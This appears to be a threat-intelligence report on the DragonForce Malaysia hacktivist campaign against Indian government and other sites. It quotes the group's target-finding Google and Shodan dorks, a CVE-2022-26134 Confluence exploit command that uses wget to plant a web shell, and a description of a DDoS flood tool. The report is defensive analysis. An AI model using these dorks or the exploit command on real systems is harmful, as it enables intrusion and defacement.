Techniques, Tactics & Procedures (TTPs) Employed by Hacktivist Group DragonForce Malaysia

Category: Adversary Intelligence	Industry: Multiple	Motivation: Hacktivism	Country: India

Executive Summary

THREAT	IMPACT	MITIGATION
DragonForce has been actively targeting Indian entities under #OpsPatuk and #OpsIndia. Threat actor groups from Pakistan, Turkey, and Palestine have joined the campaign.	Breach of some sensitive Government websites containing PII, military operations, and other government secrets.	Implement Anti-DDoS technologies Utilize specially designed network equipment. Internet hosting providers and Government Cyber Response Teams to be on high alert.

On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by the Malaysian hacktivist group, DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
The group’s primary objective of the attack was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
Since then, the group and its supporters have compromised more than 3,000 government and non-government organizations, military websites, and private entities.
The compromised entities include BJP (the ruling party of India), Army veteran websites, academic institutes, etc.

The group uses two DNS servers, “annabel.ns.cloudflare.com” and “nicolas.ns.cloudflare.com” with 104.21.35.227, and 172.67.180.87 being the IP addresses of the servers respectively.
It was discovered that the DragonForce domain was hosted along with multiple Russian, Australian, Chinese, and other websites alongside multiple adult domains.

The three primary attack vectors used by the group and its supporters are as follows and as expressed in the flow diagram:

Google Dorks are the primary source of the group's targets, which is confirmed from the following image of a Tiktok video made by one of DragonForce's allies:

The Google Dorks list included dorks for finding various educational institutions, wherein dorks relating to academic and campus logins were found.
The full list contains around 360 google dorks which could have been abused for numerous malicious purposes. A few significant dorks from the list are mentioned:

Google Dorks
inurl:/admin/upload/ : Ministry of Knowledge & Resource sharing	inurl: /login/login.php admin: For Admin logins into websites using PHP language
“allowed file types: png gif jpg txt site:gov.in” : Google dork to upload shell html files into the server	php?id= site:in: Indian sites with ID parameter that can be abused and URL manipulation could be performed
inurl/mnux = campus login : Academic institutions with Campus login parameter	inurl/mnux = academic login : Academic institutions with Academic login parameter
inurl/mnux = administrative academic login : Academic institutions with Administrative academic login parameter	inurl: /admin/cp.php : Reveals all sites with Control panel which can provide access to the server.
inurl:admin/upload.php : For sites with upload feature that actors could exploit for shell using script deface

A PoC was shared for the exploit of the Atlassian Confluence vulnerability along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.

Shodan Dork: http.favicon.hash:-305179312 country:"IN"

The actor also shared a GitHub repository script which can be downloaded and exploited using the following python command:

CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php

The group invited its members and other users on the forum to conduct the DDoS attack where they shared an infographic stating the website, IP addresses, and the port of the target.

The group used a tool called HTTPFLOOD (aka “./404FOUND.MY”), which manipulates and posts unwanted requests to bring down a web server or application. The tool has been built in Python language and it takes the following three inputs:
- A target URL
- A Proxy list
- Number of threads (i.e count of requests to be sent to the server)
Further analysis found that the user 'SKYSG404' built the HTTPFLOOD tool, and that both the tool and the Github account hosting it were created on 12 June 2022.

It was observed that a large number of domains being targeted, resolved to a common IP where they were hosted.
The attackers appeared to have gained access to the server via an injection vulnerability on one of the websites.
Once a server is compromised, all the websites hosted on it easily fall prey to the attackers, as seen in the pie chart below.

As witnessed in the table given below, almost 61% of the domains compromised belonged to E2ENetworks.in which is based in Delhi, India.
Another major chunk, 20.8%, of hacked domains belonged to Atria Convergence Technologies Pvt. Ltd.
Jointly, both of these ISPs constitute around 81% of the compromised websites.

IP	Percentage	Location	Name of ISP
164.52.212.58	40.1	Saidabad, New Delhi, India	E2ENetworks.in
216.48.179.60	20.8	Saidabad, New Delhi, India	E2ENetworks.in
183.83.180.226	20.8	Lucknow, Uttar Pradesh, India	Atria Convergence Technologies pvt ltd
120.138.4.218	8.2	Valsad, Gujarat, India	SHREENET
103.115.194.39	4.8	Mumbai, India	Netmagic Datacenter Mumbai

Impact	Mitigation
Escalation of such campaigns on a global level can lead to atrocious consequences for the Indian government and entities. Exposed data would equip malicious actors with details required to launch sophisticated attacks. Attacks on defense infrastructure can lead to sensitive information being compromised and cause a national security issue.	Patch vulnerable and exploitable endpoints. Monitor for anomalies in user accounts and internet-exposed web applications, indicating possible account takeovers. Scan repositories to identify exposed credentials and secrets. Monitor cybercrime forums for the latest tactics employed by threat actors.